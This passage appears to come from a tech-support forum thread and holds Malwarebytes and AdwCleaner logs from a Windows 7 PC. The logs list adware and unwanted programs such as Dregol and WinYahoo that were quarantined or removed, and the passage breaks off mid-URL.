Administrator: Yes

Version: 2.1.8.1057
Malware Database: v2015.07.18.04
Rootkit Database: v2015.07.17.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: J. Powers

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 445190
Time Elapsed: 34 min, 59 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 15
PUP.Optional.LyricsAd, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\lrcsing@DNMard.net, Quarantined, [261660831872d561d53dda0d44bcac54],
PUP.Optional.Dregol.C, HKLM\SOFTWARE\CLASSES\APPID\{da3128b1-de9e-4e11-81dc-e12090c8f3b9}, Quarantined, [cf6de5fe6822c47263a37b1cb84c6898],
PUP.Optional.Dregol.C, HKLM\SOFTWARE\CLASSES\WOW6432NODE\APPID\{da3128b1-de9e-4e11-81dc-e12090c8f3b9}, Quarantined, [fe3efbe8a0eadd5963a37c1b4bb9e41c],
PUP.Optional.Dregol.A, HKLM\SOFTWARE\GOOGLE\CHROME\EXTENSIONS\ihokndmjeombjojnfkmapfnjeghjohim, Quarantined, [5be1f5eec0caee48d8fc8e7e9370d030],
PUP.Optional.WinYahoo.A, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{8CDE19E6-71C2-4B46-89B7-35F6A18C571A}, Quarantined, [3309865d18724aec677136d05ba825db],
PUP.Optional.CleverSearch.A, HKLM\SOFTWARE\WOW6432NODE\CleverSearch_1.10.0.17, Quarantined, [df5d677c8dfdb68055c3a75e92713fc1],
PUP.Optional.Dregol.C, HKLM\SOFTWARE\WOW6432NODE\CLASSES\APPID\{da3128b1-de9e-4e11-81dc-e12090c8f3b9}, Quarantined, [f14bdf049ded7eb88d79e1b606fee51b],
PUP.Optional.Dregol.A, HKLM\SOFTWARE\WOW6432NODE\GOOGLE\CHROME\EXTENSIONS\ihokndmjeombjojnfkmapfnjeghjohim, Quarantined, [ba821bc83a509d99d40041cb62a1639d],
PUP.Optional.CleverSearch.A, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\csfd_1_10_0_17, Quarantined, [1329c023068493a338d5a065768da45c],
PUP.Optional.Dregol.A, HKU\S-1-5-21-3654736093-338424075-1572945638-1002\SOFTWARE\run_dregol, Quarantined, [44f8d211c9c16dc92cad55b706fdf30d],
PUP.Optional.Dregol.A, HKU\S-1-5-21-3654736093-338424075-1572945638-1002\SOFTWARE\GOOGLE\CHROME\EXTENSIONS\ihokndmjeombjojnfkmapfnjeghjohim, Quarantined, [6dcfb3302a60c076963fb45820e34bb5],
PUP.Optional.Dregol.A, HKU\S-1-5-21-3654736093-338424075-1572945638-1002\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{29E17992-E3A4-40E4-A255-D85843B37E03}, Quarantined, [ee4e04df94f6e74f631adfaaba4aba46],
PUP.Optional.WinYahoo.A, HKU\S-1-5-21-3654736093-338424075-1572945638-1002\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{8CDE19E6-71C2-4B46-89B7-35F6A18C571A}, Quarantined, [310b18cbfc8ec96dfbdc09fd24dfca36],
PUP.Optional.WinYahoo.A, HKU\S-1-5-21-3654736093-338424075-1572945638-1002\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{C9AB6446-7EFC-47FE-966C-DC54324EFF9F}, Quarantined, [cb71d21113779b9b2219a2ef37cd2ed2],
PUP.Optional.ProductSetup.A, HKU\S-1-5-21-3654736093-338424075-1572945638-1002\SOFTWARE\PRODUCTSETUP, Quarantined, [d06c7d66b2d8db5b7fa12471fc08ef11],

Registry Values: 17
PUP.Optional.WinYahoo.A, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{8CDE19E6-71C2-4B46-89B7-35F6A18C571A}|URL, http://us.yhs4.search.yahoo.com/yhs...uarantinedDwny_ir_15_25&osQuarantinedDWindows 7 Home Premium&p={searchTerms}, [3309865d18724aec677136d05ba825db], %5
PUP.Optional.WinYahoo.A, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{8CDE19E6-71C2-4B46-89B7-35F6A18C571A}|TopResultURLFallback, http://us.yhs4.search.yahoo.com/yhs...uarantinedDwny_ir_15_25&osQuarantinedDWindows 7 Home Premium&p={searchTerms}, [4af21dc6177387afd70185817b88e917], %5
Rootkit.Fileless.MTGen, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN|^dd7d1640, Quarantined, [6cd00bd88cfee74f96f5e7a85ea6768a],
PUP.Optional.Dregol.C, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY|AppPath, C:\Program Files (x86)\Run_Dregol\\, Quarantined, [ac90f4efa3e7231322d752b537ccb848]
Rootkit.Fileless.MTGen, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN|^dd7d1640, Quarantined, [2e0e875c58325adc494276198b7949b7],
Rootkit.Fileless.MTGen, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^94ee119e, Quarantined, [9ba119ca8dfd7eb890dc701fa460867a],
PUP.Optional.Dregol.A, HKU\S-1-5-21-3654736093-338424075-1572945638-1002\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{29E17992-E3A4-40E4-A255-D85843B37E03}|URL, http://www.dregol.com/results.php?f...0CzyyC0DtAtD0CtB2QtN0A0LzuyE&cr=601187289&ir=, Quarantined, [ee4e04df94f6e74f631adfaaba4aba46]
PUP.Optional.Dregol.A, HKU\S-1-5-21-3654736093-338424075-1572945638-1002\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{29E17992-E3A4-40E4-A255-D85843B37E03}|TopResultURLFallback, http://www.dregol.com/results.php?f...0CzyyC0DtAtD0CtB2QtN0A0LzuyE&cr=601187289&ir=, Quarantined, [72ca697a800a95a1de9fa7e2c73d956b]
PUP.Optional.Dregol.A, HKU\S-1-5-21-3654736093-338424075-1572945638-1002\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{29E17992-E3A4-40E4-A255-D85843B37E03}|FaviconPath, C:\Users\J. Powers\AppData\LocalLow\Microsoft\Internet Explorer\Services\Run_Dregol.ico, Quarantined, [8fad9e45593104322a535a2f0cf8fa06]
PUP.Optional.Dregol.A, HKU\S-1-5-21-3654736093-338424075-1572945638-1002\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{29E17992-E3A4-40E4-A255-D85843B37E03}, Dregol, Quarantined, [9e9e23c03357191dc5b82a5fea1abb45]
PUP.Optional.Dregol.A, HKU\S-1-5-21-3654736093-338424075-1572945638-1002\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{29E17992-E3A4-40E4-A255-D85843B37E03}|DisplayName, Dregol, Quarantined, [211b746fc8c2cc6af28b2069d4300af6]
PUP.Optional.WinYahoo.A, HKU\S-1-5-21-3654736093-338424075-1572945638-1002\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{8CDE19E6-71C2-4B46-89B7-35F6A18C571A}|URL, http://us.yhs4.search.yahoo.com/yhs...uarantinedDwny_ir_15_25&osQuarantinedDWindows 7 Home Premium&p={searchTerms}, [310b18cbfc8ec96dfbdc09fd24dfca36], %5
PUP.Optional.WinYahoo.A, HKU\S-1-5-21-3654736093-338424075-1572945638-1002\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{8CDE19E6-71C2-4B46-89B7-35F6A18C571A}|TopResultURLFallback, http://us.yhs4.search.yahoo.com/yhs...uarantinedDwny_ir_15_25&osQuarantinedDWindows 7 Home Premium&p={searchTerms}, [94a8f3f0b7d367cfc215967059aaa957], %5
PUP.Optional.WinYahoo.A, HKU\S-1-5-21-3654736093-338424075-1572945638-1002\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{c9ab6446-7efc-47fe-966c-dc54324eff9f}|URL, http://us.yhs4.search.yahoo.com/yhs...arantinedDwncy_ir_15_25&osQuarantinedDWindows 7 Home Premium&p={searchTerms}, [cb71d21113779b9b2219a2ef37cd2ed2], %5
PUP.Optional.WinYahoo.A, HKU\S-1-5-21-3654736093-338424075-1572945638-1002\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{c9ab6446-7efc-47fe-966c-dc54324eff9f}|TopResultURLFallback, http://us.yhs4.search.yahoo.com/yhs...arantinedDwncy_ir_15_25&osQuarantinedDWindows 7 Home Premium&p={searchTerms}, [0339ecf7bad073c39c9f6928d82cff01], %5
Rootkit.Fileless.MTGen, HKU\S-1-5-21-3654736093-338424075-1572945638-1002\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^94ee119e, Quarantined, [ca72b42f038787af3536aee1867efc04],
PUP.Optional.ProductSetup.A, HKU\S-1-5-21-3654736093-338424075-1572945638-1002\SOFTWARE\PRODUCTSETUP|tb, 0J1J1R1K0B1D1K1M1E0Z, Quarantined, [d06c7d66b2d8db5b7fa12471fc08ef11]

Registry Data: 0
(No malicious items detected)

Folders: 9
PUP.Optional.LyricsAd, C:\Program Files (x86)\LyricSing, Quarantined, [dd5f756e92f874c2818ac3117191cf31],
PUP.Optional.Dregol.A, C:\Users\J. Powers\AppData\Roaming\Run_dregol, Quarantined, [af8dab38573348ee0b4d29d5887a5aa6],
PUP.Optional.Dregol.A, C:\Users\J. Powers\AppData\Roaming\Run_dregol\UpdateProc, Quarantined, [af8dab38573348ee0b4d29d5887a5aa6],
PUP.Optional.Dregol.A, C:\Program Files (x86)\Run_Dregol, Quarantined, [b98313d0bfcb9c9a223765994bb78f71],
PUP.Optional.Dregol.A, C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihokndmjeombjojnfkmapfnjeghjohim, Quarantined, [8cb0d40ff3971521d487cb33c042fa06],
PUP.Optional.Dregol.A, C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihokndmjeombjojnfkmapfnjeghjohim\0.5.1_0, Quarantined, [8cb0d40ff3971521d487cb33c042fa06],
PUP.Optional.Dregol.A, C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihokndmjeombjojnfkmapfnjeghjohim\0.5.1_0\js, Quarantined, [8cb0d40ff3971521d487cb33c042fa06],
PUP.Optional.Dregol.A, C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihokndmjeombjojnfkmapfnjeghjohim\0.5.1_0\lib, Quarantined, [8cb0d40ff3971521d487cb33c042fa06],
PUP.Optional.SetSearchSetting.A, C:\Users\J. Powers\AppData\Roaming\Mozilla\Firefox\Profiles\r7t3wel5.default-1419397623955\extensions\{9b7d4705-916e-4168-b535-1f5315e44b47}, Quarantined, [fe3e667daae079bd6a0bf970bc4906fa],

Files: 49
PUP.Optional.LyricsAd, C:\Program Files (x86)\LyricSing\Uninstall.exe, Quarantined, [261660831872d561d53dda0d44bcac54],
PUP.Optional.RocketFuel.A, C:\Users\J. Powers\Downloads\7zip_RocketFuelInstaller.exe, Quarantined, [0d2fa83bd1b9f83e5f4cc22a3aca03fd],
PUP.Optional.APNToolBar.A, C:\Users\J. Powers\Downloads\ManyCamSetup(1).exe, Quarantined, [3804a241107ae254c7a63f68758c9769],
PUP.Optional.APNToolBar.A, C:\Users\J. Powers\Downloads\ManyCamSetup(2).exe, Quarantined, [43f9c51e5e2c3afc85e8ddca5ca5ae52],
PUP.Optional.APNToolBar.A, C:\Users\J. Powers\Downloads\ManyCamSetup(3).exe, Quarantined, [93a9b42f94f6d561b1bcbbec53ae946c],
PUP.Optional.APNToolBar.A, C:\Users\J. Powers\Downloads\ManyCamSetup(4).exe, Quarantined, [d16b2cb79af084b24b22aef903fe946c],
PUP.Optional.APNToolBar.A, C:\Users\J. Powers\Downloads\ManyCamSetup(5).exe, Quarantined, [b08c7b68781277bfef7e1d8a6f92fd03],
PUP.Optional.APNToolBar.A, C:\Users\J. Powers\Downloads\ManyCamSetup.exe, Quarantined, [ea52d90a2a602b0bd29b7334ec15fb05],
PUP.Optional.WorldSetup, C:\Users\J. Powers\Downloads\CR_Downloader_for_pokemon-red.exe, Quarantined, [92aa746f7119c1753d7747a537cd6b95],
PUP.Optional.Dregol.C, C:\Users\J. Powers\AppData\LocalLow\Microsoft\Internet Explorer\Services\Run_Dregol.ico, Quarantined, [78c49b48d2b8fe3844abec1b21e20af6],
PUP.Optional.Vitruvian.A, C:\Users\J. Powers\AppData\Local\Temp\vitruvian-installer-hardwareprofile-v0001, Quarantined, [300c2db6741667cf86a9c3c125dff010],
PUP.Optional.Vitruvian.A, C:\Users\J. Powers\AppData\Local\Temp\vitruvian-installer-install-v0003, Quarantined, [e25a499a157560d6ba75691b7193ed13],
PUP.Optional.Vitruvian.A, C:\Users\J. Powers\AppData\Local\Temp\vitruvian-installer-processes-v0002, Quarantined, [80bcac370684a393052a364e5ca8b44c],
PUP.Optional.Vitruvian.A, C:\Users\J. Powers\AppData\Local\Temp\vitruvian-installer-scheduledtasks-v0001, Quarantined, [c577f9ea8dfd76c0a18ed8ac84800af6],
PUP.Optional.Vitruvian.A, C:\Users\J. Powers\AppData\Local\Temp\vitruvian-installer-softwareregkeys-v0002, Quarantined, [54e85390c1c9f83ef53ad4b08d77f10f],
PUP.Optional.Vitruvian.A, C:\Users\J. Powers\AppData\Local\Temp\vitruvian-installer-uninstall-v0002, Quarantined, [a894479c6e1c71c5919e473d20e4aa56],
PUP.Optional.WinYahoo, C:\Users\J. Powers\AppData\LocalLow\Microsoft\Internet Explorer\Services\WinYahoo.ico, Quarantined, [9f9deaf94a409f974523147cab593ec2],
PUP.Optional.LyricsAd, C:\Program Files (x86)\LyricSing\sqlite3.dll, Quarantined, [dd5f756e92f874c2818ac3117191cf31],
PUP.Optional.Dregol.A, C:\Users\J. Powers\AppData\Roaming\Run_dregol\UpdateProc\info.dat, Quarantined, [af8dab38573348ee0b4d29d5887a5aa6],
PUP.Optional.Dregol.A, C:\Users\J. Powers\AppData\Roaming\Run_dregol\UpdateProc\STTL.DAT, Quarantined, [af8dab38573348ee0b4d29d5887a5aa6],
PUP.Optional.Dregol.A, C:\Users\J. Powers\AppData\Roaming\Run_dregol\UpdateProc\TTL.DAT, Quarantined, [af8dab38573348ee0b4d29d5887a5aa6],
PUP.Optional.Dregol.A, C:\Users\J. Powers\AppData\Roaming\Run_dregol\UpdateProc\UpdateTask.exe, Quarantined, [af8dab38573348ee0b4d29d5887a5aa6],
PUP.Optional.Dregol.A, C:\Program Files (x86)\Run_Dregol\Sqlite3.dll, Quarantined, [b98313d0bfcb9c9a223765994bb78f71],
PUP.Optional.Dregol.A, C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihokndmjeombjojnfkmapfnjeghjohim\0.5.1_0\js\background.js, Quarantined, [8cb0d40ff3971521d487cb33c042fa06],
PUP.Optional.Dregol.A, C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihokndmjeombjojnfkmapfnjeghjohim\0.5.1_0\js\bootstrap.js, Quarantined, [8cb0d40ff3971521d487cb33c042fa06],
PUP.Optional.Dregol.A, C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihokndmjeombjojnfkmapfnjeghjohim\0.5.1_0\js\newtab.js, Quarantined, [8cb0d40ff3971521d487cb33c042fa06],
PUP.Optional.Dregol.A, C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihokndmjeombjojnfkmapfnjeghjohim\0.5.1_0\js\opentab.js, Quarantined, [8cb0d40ff3971521d487cb33c042fa06],
PUP.Optional.Dregol.A, C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihokndmjeombjojnfkmapfnjeghjohim\0.5.1_0\lib\aes.js, Quarantined, [8cb0d40ff3971521d487cb33c042fa06],
PUP.Optional.Dregol.A, C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihokndmjeombjojnfkmapfnjeghjohim\0.5.1_0\lib\angular-route.min.js, Quarantined, [8cb0d40ff3971521d487cb33c042fa06],
PUP.Optional.Dregol.A, C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihokndmjeombjojnfkmapfnjeghjohim\0.5.1_0\lib\angular.min.js, Quarantined, [8cb0d40ff3971521d487cb33c042fa06],
PUP.Optional.Dregol.A, C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihokndmjeombjojnfkmapfnjeghjohim\0.5.1_0\lib\async.min.js, Quarantined, [8cb0d40ff3971521d487cb33c042fa06],
PUP.Optional.Dregol.A, C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihokndmjeombjojnfkmapfnjeghjohim\0.5.1_0\lib\aws-sdk-2.0.0-rc9.min.js, Quarantined, [8cb0d40ff3971521d487cb33c042fa06],
PUP.Optional.Dregol.A, C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihokndmjeombjojnfkmapfnjeghjohim\0.5.1_0\lib\eventsource.min.js, Quarantined, [8cb0d40ff3971521d487cb33c042fa06],
PUP.Optional.Dregol.A, C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihokndmjeombjojnfkmapfnjeghjohim\0.5.1_0\lib\idbstore.min.js, Quarantined, [8cb0d40ff3971521d487cb33c042fa06],
PUP.Optional.Dregol.A, C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihokndmjeombjojnfkmapfnjeghjohim\0.5.1_0\lib\jquery-2.1.1.min.js, Quarantined, [8cb0d40ff3971521d487cb33c042fa06],
PUP.Optional.Dregol.A, C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihokndmjeombjojnfkmapfnjeghjohim\0.5.1_0\lib\jquery-ui-1.10.3.custom.min.js, Quarantined, [8cb0d40ff3971521d487cb33c042fa06],
PUP.Optional.Dregol.A, C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihokndmjeombjojnfkmapfnjeghjohim\0.5.1_0\lib\js-canvas-to-blob.js, Quarantined, [8cb0d40ff3971521d487cb33c042fa06],
PUP.Optional.Dregol.A, C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihokndmjeombjojnfkmapfnjeghjohim\0.5.1_0\lib\lodash.underscore.min.js, Quarantined, [8cb0d40ff3971521d487cb33c042fa06],
PUP.Optional.Dregol.A, C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihokndmjeombjojnfkmapfnjeghjohim\0.5.1_0\lib\md5.js, Quarantined, [8cb0d40ff3971521d487cb33c042fa06],
PUP.Optional.Dregol.A, C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihokndmjeombjojnfkmapfnjeghjohim\0.5.1_0\lib\mixins.loadash.js, Quarantined, [8cb0d40ff3971521d487cb33c042fa06],
PUP.Optional.Dregol.A, C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihokndmjeombjojnfkmapfnjeghjohim\0.5.1_0\lib\moment-with-langs.min.js, Quarantined, [8cb0d40ff3971521d487cb33c042fa06],
PUP.Optional.Dregol.A, C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihokndmjeombjojnfkmapfnjeghjohim\0.5.1_0\lib\moment.min.js, Quarantined, [8cb0d40ff3971521d487cb33c042fa06],
PUP.Optional.Dregol.A, C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihokndmjeombjojnfkmapfnjeghjohim\0.5.1_0\lib\phoneformat.js, Quarantined, [8cb0d40ff3971521d487cb33c042fa06],
PUP.Optional.Dregol.A, C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihokndmjeombjojnfkmapfnjeghjohim\0.5.1_0\lib\sha1.js, Quarantined, [8cb0d40ff3971521d487cb33c042fa06],
PUP.Optional.Dregol.A, C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihokndmjeombjojnfkmapfnjeghjohim\0.5.1_0\lib\sortable.js, Quarantined, [8cb0d40ff3971521d487cb33c042fa06],
PUP.Optional.Dregol.A, C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihokndmjeombjojnfkmapfnjeghjohim\0.5.1_0\lib\utils.js, Quarantined, [8cb0d40ff3971521d487cb33c042fa06],
PUP.Optional.SetSearchSetting.A, C:\Users\J. Powers\AppData\Roaming\Mozilla\Firefox\Profiles\r7t3wel5.default-1419397623955\extensions\{9b7d4705-916e-4168-b535-1f5315e44b47}\install.rdf, Quarantined, [fe3e667daae079bd6a0bf970bc4906fa],
PUP.Optional.SetSearchSetting.A, C:\Users\J. Powers\AppData\Roaming\Mozilla\Firefox\Profiles\r7t3wel5.default-1419397623955\extensions\{9b7d4705-916e-4168-b535-1f5315e44b47}\bootstrap.js, Quarantined, [fe3e667daae079bd6a0bf970bc4906fa],
PUP.Optional.SetSearchSetting.A, C:\Users\J. Powers\AppData\Roaming\Mozilla\Firefox\Profiles\r7t3wel5.default-1419397623955\extensions\{9b7d4705-916e-4168-b535-1f5315e44b47}\search.json, Quarantined, [fe3e667daae079bd6a0bf970bc4906fa],

Physical Sectors: 0
(No malicious items detected)


(end)

 

[Domo124]

Adware cleaner made two logs, Ill add them both. Fist the S(0):

# AdwCleaner v4.208 - Logfile created 16/07/2015 at 18:15:45
# Updated 09/07/2015 by Xplode
# Database : 2015-07-15.1 [Server]
# Operating system : Windows 7 Home Premium Service Pack 1 (x64)
# Username : J. Powers - DEMON-PC
# Running from : C:\Users\J. Powers\Downloads\adwcleaner_4.208.exe
# Option : Cleaning

***** [ Services ] *****

[#] Service Deleted : mcaudrv_simple
[#] Service Deleted : ManyCam
[#] Service Deleted : csfd_1_10_0_17

***** [ Files / Folders ] *****

Folder Deleted : C:\ProgramData\StarApp
Folder Deleted : C:\Program Files (x86)\Run_Dregol
Folder Deleted : C:\Program Files (x86)\LyricSing
Folder Deleted : C:\Users\J. Powers\AppData\Local\PackageAware
Folder Deleted : C:\Users\J. Powers\AppData\Roaming\Run_Dregol
Folder Deleted : C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihokndmjeombjojnfkmapfnjeghjohim
File Deleted : C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_ihokndmjeombjojnfkmapfnjeghjohim_0.localstorage
File Deleted : C:\END
File Deleted : C:\Windows\System32\drivers\mcaudrv_x64.sys
File Deleted : C:\Users\J. Powers\AppData\Roaming\Mozilla\Firefox\Profiles\r7t3wel5.default-1419397623955\searchplugins\search-provided-by-yahoo.xml

***** [ Scheduled tasks ] *****

Task Deleted : Run_Dregol

***** [ Shortcuts ] *****


***** [ Registry ] *****

Key Deleted : HKLM\SOFTWARE\Google\Chrome\Extensions\bopakagnckmlgajfccecajhnimjiiedh
Key Deleted : HKCU\Software\Google\Chrome\Extensions\ihokndmjeombjojnfkmapfnjeghjohim
Key Deleted : HKLM\SOFTWARE\Google\Chrome\Extensions\ihokndmjeombjojnfkmapfnjeghjohim
Key Deleted : [x64] HKLM\SOFTWARE\Google\Chrome\Extensions\ihokndmjeombjojnfkmapfnjeghjohim
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{D54C859C-6066-4F31-8FE0-2AAEDCAE67D7}
Key Deleted : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{29E17992-E3A4-40E4-A255-D85843B37E03}
Key Deleted : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{8CDE19E6-71C2-4B46-89B7-35F6A18C571A}
Key Deleted : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{c9ab6446-7efc-47fe-966c-dc54324eff9f}
Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{8CDE19E6-71C2-4B46-89B7-35F6A18C571A}
Key Deleted : HKCU\Software\APN PIP
Key Deleted : HKCU\Software\usyndication.com
Key Deleted : HKCU\Software\USyndication
Key Deleted : HKCU\Software\Run_Dregol
Key Deleted : HKCU\Software\PRODUCTSETUP
Key Deleted : HKLM\SOFTWARE\PIP
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\lrcsing@DNMard.net

***** [ Web browsers ] *****

-\\ Internet Explorer v11.0.9600.17909


-\\ Mozilla Firefox v39.0 (x86 en-US)


-\\ Google Chrome v43.0.2357.134

[C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://search.aol.com/aol/search?q={searchTerms}
[C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}
[C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://us.yhs4.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wny_ir_15_25&param1=1&param2=f%3D4%26b%3DChrome%26cc%3Dus%26pa%3DWinYahoo%26cd%3D2XzuyEtN2Y1L1Qzu0EtD0Bzy0AyD0F0AyB0D0A0FyD0FyBtBtN0D0Tzu0StCtByCtAtN1L2XzutAtFtCtDtFtCtDtFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StByD0C0CyEtA0BtAtGyDtCyDyEtG0E0CyE0CtGtC0ByB0FtGyEtC0AyCyCzzzz0AtBtByEtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyCzytCtBtAyDzztBtG0B0E0E0FtGyEtCtDyBtG0B0E0FyEtG0FtA0EyByDzzzy0FyC0F0EyC2QtN0A0LzuyE%26cr%3D997119123%26a%3Dwny_ir_15_25%26os%3DWindows 7 Home Premium&p={searchTerms}
[C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://www.dregol.com/results.php?f=4&q={searchTerms}&a=drg_ir_15_25&cd=2XzuyEtN2Y1L1Qzu0EtD0Bzy0AyD0F0AyB0D0A0FyD0FyBtBtN0D0Tzu0StCtByCtAtN1L2XzutAtFtCtDtFtCtDtFtDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2SyD0A0C0EyC0ByE0AtGyB0Dzy0DtG0Bzz0BtDtGtByB0BtBtG0E0ByDyBtBtBzyyB0Fzz0Bzz2QtN1M1F1B2Z1V1N2Y1L1Qzu2StC0D0DyE0FyDtAyEtG0C0DtDtBtGyE0F0AyEtGzyyEtA0AtGyBtC0C0C0CzyyC0DtAtD0CtB2QtN0A0LzuyE&cr=601187289&ir=
[C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] - Deleted [Homepage] : hxxp://www.dregol.com/?f=1&a=drg_ir_15_25&cd=2XzuyEtN2Y1L1Qzu0EtD0Bzy0AyD0F0AyB0D0A0FyD0FyBtBtN0D0Tzu0StCtByCtAtN1L2XzutAtFtCtDtFtCtDtFtDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2SyD0A0C0EyC0ByE0AtGyB0Dzy0DtG0Bzz0BtDtGtByB0BtBtG0E0ByDyBtBtBzyyB0Fzz0Bzz2QtN1M1F1B2Z1V1N2Y1L1Qzu2StC0D0DyE0FyDtAyEtG0C0DtDtBtGyE0F0AyEtGzyyEtA0AtGyBtC0C0C0CzyyC0DtAtD0CtB2QtN0A0LzuyE&cr=601187289&ir=
[C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] - Deleted [Startup_URLs] : B86EDAD82CC65EF8C6B5622AEB02CB6E8DB52B4241B0799F951A100803C9DF73"},"software_reporter":{"prompt_reason":"934E36FC82C7BDE42E031968D6EBD74CADAF83648B8B44757127CACB376E7FEB","prompt_seed":"68DB522F6D2437BD3735F293C3E9130D6260624F55B8F37CA0F19FB36826DAAA","prompt_version":"BE339162B0E946D0CC6D8993FF3638FA3CCF01AFE7C6AD9FCECFCB7E0502D658"},"sync":{"remaining_rollback_tries":"BA13BE78AB89D0AB725521E18D0F96AA7C6198AB8735A76EB0FC87BB7400D3CC"}},"super_mac":"84EF3A6D98210248B5E7394C2AE336AA742F9137BCA86E28D9957A67D678CD22"},"session":{"restore_on_startup":4,"startup_urls":["hxxp://www.dregol.com/?f=7&a=drg_ir_15_25&cd=2XzuyEtN2Y1L1Qzu0EtD0Bzy0AyD0F0AyB0D0A0FyD0FyBtBtN0D0Tzu0StCtByCtAtN1L2XzutAtFtCtDtFtCtDtFtDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2SyD0A0C0EyC0ByE0AtGyB0Dzy0DtG0Bzz0BtDtGtByB0BtBtG0E0ByDyBtBtBzyyB0Fzz0Bzz2QtN1M1F1B2Z1V1N2Y1L1Qzu2StC0D0DyE0FyDtAyEtG0C0DtDtBtGyE0F0AyEtGzyyEtA0AtGyBtC0C0C0CzyyC0DtAtD0CtB2QtN0A0Lzuy